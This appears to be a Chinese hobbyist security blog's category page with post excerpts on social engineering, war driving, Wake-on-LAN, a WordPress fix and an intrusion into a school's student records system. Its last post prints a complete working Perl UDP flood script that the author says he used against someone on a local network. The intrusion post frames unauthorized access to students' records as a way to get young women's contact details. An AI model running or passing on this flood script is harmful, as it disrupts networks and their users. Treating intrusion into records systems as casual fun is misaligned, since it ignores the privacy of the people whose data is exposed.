Posts under category 新技能

[Security] 换个思路,对某培训机构进行一次 YD 的社工检测

前段时间有个奇怪的培训机构过来我们学校要搞个什么网络安全比赛,问了绿盟的一个朋友,听都没听过有家这样的安全公司,于是我小小的调戏了一下,期间的故事是颠簸起伏,于是就有了这次 YD 的检测。本文只是讲解渗透思路和技巧,部分技术实现细节将略过,有兴趣可以自行搜索相关资料。非法入侵是违法行为,请勿以身试法。

- Read More -

[Note] Office 2010 从任意位置开始插入页码

今天改论文,老师的一个又一个奇怪的格式要求真的让我快受不了,然后有一个要求:摘要目录等前几页不加页码,从正文开始编码第一页,然后再做文章的目录。然后围绕这个如何在文档任意页面插入开始插入页码折腾了大半小时,终于弄好了,现在写一下,做个备忘,以后肯定用得上,小伙伴们写论文的也可以记住这技巧了。

- Read More -

一次随意的 War Driving

饭后又是一个人在家,没事可做于是带上各种终端外出进行一行周末无线网络的探测,War Driving 开始!

带上帽子背上背包,调试好接收和定位设备就开始出发,绕着附近转了一大圈,回来就抓到了不少信息,整理得到一个小的无线数据库。

![]https://bobylive.com/usr/uploads/2014-07-16_210433.png)

根据 GPS 提供的经纬信息再导出成 KML 文件,放到 Google Earth 中去,一目了然。下一步目标建立全市的无线信息表,根据 MAC和 SSID 进行终端定位,几乎可达 1 M 精确度。

无聊折腾 WOL

看书看得有点昏昏沉沉,不搞东西会死的我就来折腾一下 WOL。

WOL,全程 Wake On LAN,通常也叫网络唤醒,现在很多机器的 Bios 和网卡都支持这个功能,大家可以在 Bios 设置中找到,将Wake On Lan 和 Wake On PCI 调成 Enable 就可以体验下网络唤醒的快感了哈哈哈哈哈。

- Read More -

无意射进学籍档案管理系统

0x00 起因

春天终于离开了,夏天轰隆隆地压在我身上透不过气来。快要毕业了啊,十年寒窗苦读就等毕业这一刻了,可苦逼的是居然没在离开之前认识几个年轻的小师妹,好歹自己也曾经算是个名人啊,不立个铜像也要到处留点情嘛!想当年,撸主我还年轻……(撸主你跑题了)。咳咳,正因为学校偶尔碰见清新的妹子又不好意思上前搭讪,看来只能拿到联系方式再慢慢培养感情了。

- Read More -

科普之《窃听风云3》

刚刚考完试那天晚上就自己跑去看了午夜场的《窃听风云3》,第三部相比前面两部稍显逊色了,无论是剧情还是其他各方面因素,至于我是抱着观赏技术的心态去看的,影评什么的不说太多,直接进入主题,科普下《窃听风云3》里面的一些技术手段。

- Read More -

[Bugs] 修复 WordPress 3.9 SMTP 连接服务器失败的问题

WordPress 3.8 在连续更新了三个版本之后,终于按捺不住,推出了 WordPress 3.9 的更新,其中很多模块都使用了更新的版本,可 PHPMailer 的最新版本却是有连接 SMTP 服务器失败的 Bug。

解决方法也是很简单,把模块替换成 3.8 时使用的旧版本即可。目前已经向 WordPress 官方提交了反馈。这里给出旧版本的 PHP 文件下载,替换掉 WordPress 中 wp-includes 的两个对应文件即可。

旧版本 PHPMailer:

fix-20140422(CDN1):Download
fix-20140422(本地服务器):Download

N900 进行 UDP Flood 攻击

[本文部分内容涉及攻击性,仅供研究交流,请勿恶意利用。]

之前跟某某对着干,写了个小程序在内网用来 UDP Flood 攻击,后来想了想,可不可以用我的 N900 进行呢,后来找了一些参考资料,决定从 Perl 下手。

#!/usr/bin/perl

############################

udp flood script for perl

############################

use Socket;
use strict;

if ($#ARGV != 3) {
print "flood.pl ip port size time\n\n";
print " port=0: use random ports\n";
print " size=0: use random size between 64 and 1024\n";
print " time=0: continuous flood\n";
exit(1);
}

my ($ip,$port,$size,$time) = @ARGV;

my ($iaddr,$endtime,$psize,$pport);

$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 1000000);

socket(flood, PF_INET, SOCK_DGRAM, 17);

print "Flooding $ip " . ($port ? $port : "random") . " port with " .
($size ? "$size-byte" : "random size") . " packets" .
($time ? " for $time seconds" : "") . "\n";
print "Break with Ctrl-C\n" unless $time;

#my $sum = 1;

for (;time() <= $endtime;) {
$psize = $size ? $size : int(rand(1024-64)+64) ;
$pport = $port ? $port : int(rand(65535))+1;
send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));
#$sum+=1;
#print "sending package".$sum;
#system "clear";
}


 

利用 Perl 的 Socket 模块大规模发送 UDP 数据包,进行 UDP 洪水攻击。不过 Dos 攻击本来就是个两败俱伤的技术手段,N900 的低配 CPU 只能勉强卡顿下网络。